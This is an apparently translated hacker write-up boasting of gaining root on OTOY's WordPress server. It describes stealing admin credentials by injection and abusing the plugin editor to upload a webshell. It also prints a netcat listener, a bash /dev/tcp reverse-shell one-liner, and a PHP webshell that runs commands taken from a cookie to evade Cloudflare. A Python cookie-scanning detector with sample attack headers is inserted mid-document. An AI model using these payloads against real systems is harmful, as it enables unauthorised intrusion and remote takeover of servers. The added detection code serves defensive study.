How root access to the OTOY server was obtained

0x1:    Obtaining the account password

    The account credentials were obtained through injection and used to log in to the WordPress admin backend (skipped).

0x2:    Uploading a webshell

        1. Media Uploader: has not been usable for this in newer WordPress versions for a long time.

        2. Themes Editor: no write permission.

        3. Plugin Editor: plugin edits cannot be activated.

           There was something called (inactive files) for plugin files. If you tried to edit a file of the plugin, only the plugin's main file would be in active mode and all other files would be marked as inactive. If you edited the main file, the plugin would be deactivated and you would not be able to see it under plugins again.

        4. Look for vulnerabilities in existing plugins.

0x3:    Bypassing the plugin restriction to upload a webshell

plugin-editor.php?file=index.php&plugin=index.php

0x4:    Reverse shell

           The reverse shell was blocked by the Cloudflare firewall.

nc -l -vvv -p 443
bash -i >& /dev/tcp/$myip/443 0>&1

                                            

0x5:    Bypassing the Cloudflare firewall for the reverse shell

          The command to execute is passed in the request's cookies.

<?php
system($_COOKIE['cmd']);

Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1
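
Step 0x5 carries the command in the Cookie header, so cookie values need inspecting at the origin server as well as at the edge. The following check is an added example, not part of the original post: the rule names, patterns and sample headers are constructed for illustration, and 198.51.100.7 is a documentation address.

```python
import re
from urllib.parse import unquote

# Rules constructed for this example: strings that have no business in a
# cookie value. Tune against your own traffic before alerting on them.
SUSPICIOUS = [
    ("dev_tcp_redirect", re.compile(r"/dev/(tcp|udp)/")),
    ("interactive_shell", re.compile(r"\b(ba|z|k|da)?sh\s+-i\b")),
    ("fd_redirection", re.compile(r"\d?[<>]&\s*\d?")),
    ("command_substitution", re.compile(r"`|\$\(")),
]

def parse_cookie_header(header):
    """Split a raw Cookie header value into (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_cookie_header(header):
    """Return {cookie_name: [matched rule names]} for suspicious cookies."""
    findings = {}
    for name, value in parse_cookie_header(header):
        hits = [rule for rule, rx in SUSPICIOUS if rx.search(decode_fully(value))]
        if hits:
            findings[name] = hits
    return findings

# Constructed sample Cookie headers: one benign, two carrying a shell command.
SAMPLES = [
    "wordpress_logged_in_abc=admin%7C1700000000%7Ctoken; wp-settings-1=editor%3Dtinymce",
    "cmd=bash -i >& /dev/tcp/198.51.100.7/443 0>&1",
    "cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F198.51.100.7%2F443%200%3E%261",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(scan_cookie_header(header) or "clean", "<-", header)
```
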

0x6:    Done ;)

        Original post: http://pwnrules.com/otoy-server-rooted/
